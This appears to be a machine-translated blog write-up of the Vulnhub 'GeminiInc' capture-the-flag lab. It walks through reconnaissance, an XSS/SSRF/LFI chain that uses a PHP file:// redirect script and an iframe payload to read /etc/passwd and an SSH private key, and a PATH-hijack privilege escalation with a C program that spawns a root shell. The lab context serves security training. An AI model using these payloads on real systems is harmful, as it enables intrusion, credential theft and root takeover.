当前位置:网站首页>Vulnhub geminiinc
Vulnhub geminiinc
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Catalog
Two 、 Service version detection
3、 ... and 、 information gathering
6、 ... and 、 information gathering
7、 ... and 、 Combined boxing XSS+SSRF+LFI
8、 ... and 、 Read gemini Private key
2.ssh Public private key login
1. /usr/bin/listinfo File analysis
11、 ... and 、 The system command file is forged
2. Modify environment variables
One 、 The host found
Half open scan
nmap -sS ip
Two 、 Service version detection
3、 ... and 、 information gathering
1. Unable to load
80 The resources of the port cannot be loaded normally , Because I have been visiting Google Some sites of , Hang a ladder to visit .
2. The main page
The source code address is given to us
3. Source code
View one by one , stay install Under the folder [email protected]
4. Try signing in
Successfully logged in , There are more functions in the upper left corner 
Four 、 Analysis function
1.export Output pdf
2.edit profile Edit the file
The information we modify will be displayed intact on the information board . There is no filter at the user name ,
5、 ... and 、 Storage type xss
Not enough to help us break through the border
6、 ... and 、 information gathering
1.export Output
We found an application in document attributes . It's just one. html turn pdf Application .
7、 ... and 、 Combined boxing XSS+SSRF+LFI
After searching , We can know that these three vulnerabilities exist in this application component . Through the combination of vulnerabilities , To read local files .
1. Local open apache service
systemctl start apache2
cd /var/www/html
sudo vim 1.php
Create a 1.php file
write in :
<?php
$file = $_GET['file'];
header("location:file://$file");2. Inject payload
<iframe src="http://ip/1.php?file=/etc/passwd" width="100%" height=1220></iframe>
3.export Trigger
Successfully read /etc/passwd file . You can see gemini Can pass shell Sign in
8、 ... and 、 Read gemini Private key
Save to kali On
2.ssh Public private key login
Successfully logged in
Nine 、find Information search
find / -type f -user root -perm -u+xs -ls 2>/dev/null
Ten 、 Binary file view
1. /usr/bin/listinfo File analysis
strings /usr/bin/listinfo
Content :
The core code is these sentences , Called the system command
2. The implementation of
11、 ... and 、 The system command file is forged
1. newly build date file
vim date.c
Content :
#include<sys/types.h>
#include<unistd.h>
#include<stdlib.h>
int main(){
setuid(0);
setgid(0);
system("/bin/bash");
}2. Modify environment variables
First look at the front , Then look from the back
export PATH=/tmp:$PATH
3. perform listinfo
Mention right to success
Get flag.txt
边栏推荐
猜你喜欢
FL Studio 20无限试用版水果编曲下载
错排问题 (抽奖,发邮件)
cgroup简介
Groovy测试类 和 Junit测试
How to clean up v$rman_ backup_ job_ Details view reports error ora-02030
STL tutorial 10 container commonalities and usage scenarios
The world's most popular font editor FontCreator tool
Kibana~Kibana的安装和配置
Arctangent entropy: the latest SCI paper in July 2022
vulnhub之narak
随机推荐
Mysql根据时间搜索常用方法整理
程序员的创业陷阱:接私活
Cuiyusong, CTO of youzan: the core goal of Jarvis is to make products smarter and more reliable
优化接口性能
MySQL uses the method of updating linked tables with update
Repo ~ common commands
DS90UB949
解决msvcp120d.dll和msvcr120d.dll缺失
软件测试周刊(第78期):你对未来越有信心,你对现在越有耐心。
Kubernetes 三打探针及探针方式
抓包整理外篇fiddler———— 会话栏与过滤器[二]
How to get started embedded future development direction of embedded
MySQL searches and sorts out common methods according to time
Slam mapping and autonomous navigation simulation based on turnlebot3
Mmc5603nj geomagnetic sensor (Compass example)
. \vmware-vdiskmanager. exe -k “c:\\xxxxx.vmdk”
AOSP ~ NTP ( 网络时间协议 )
Hongmeng third training (project training)
R language uses grid of gridextra package The array function combines multiple visual images of the ggplot2 package horizontally, and the ncol parameter defines the number of columns of the combined g
rxjs Observable filter Operator 的实现原理介绍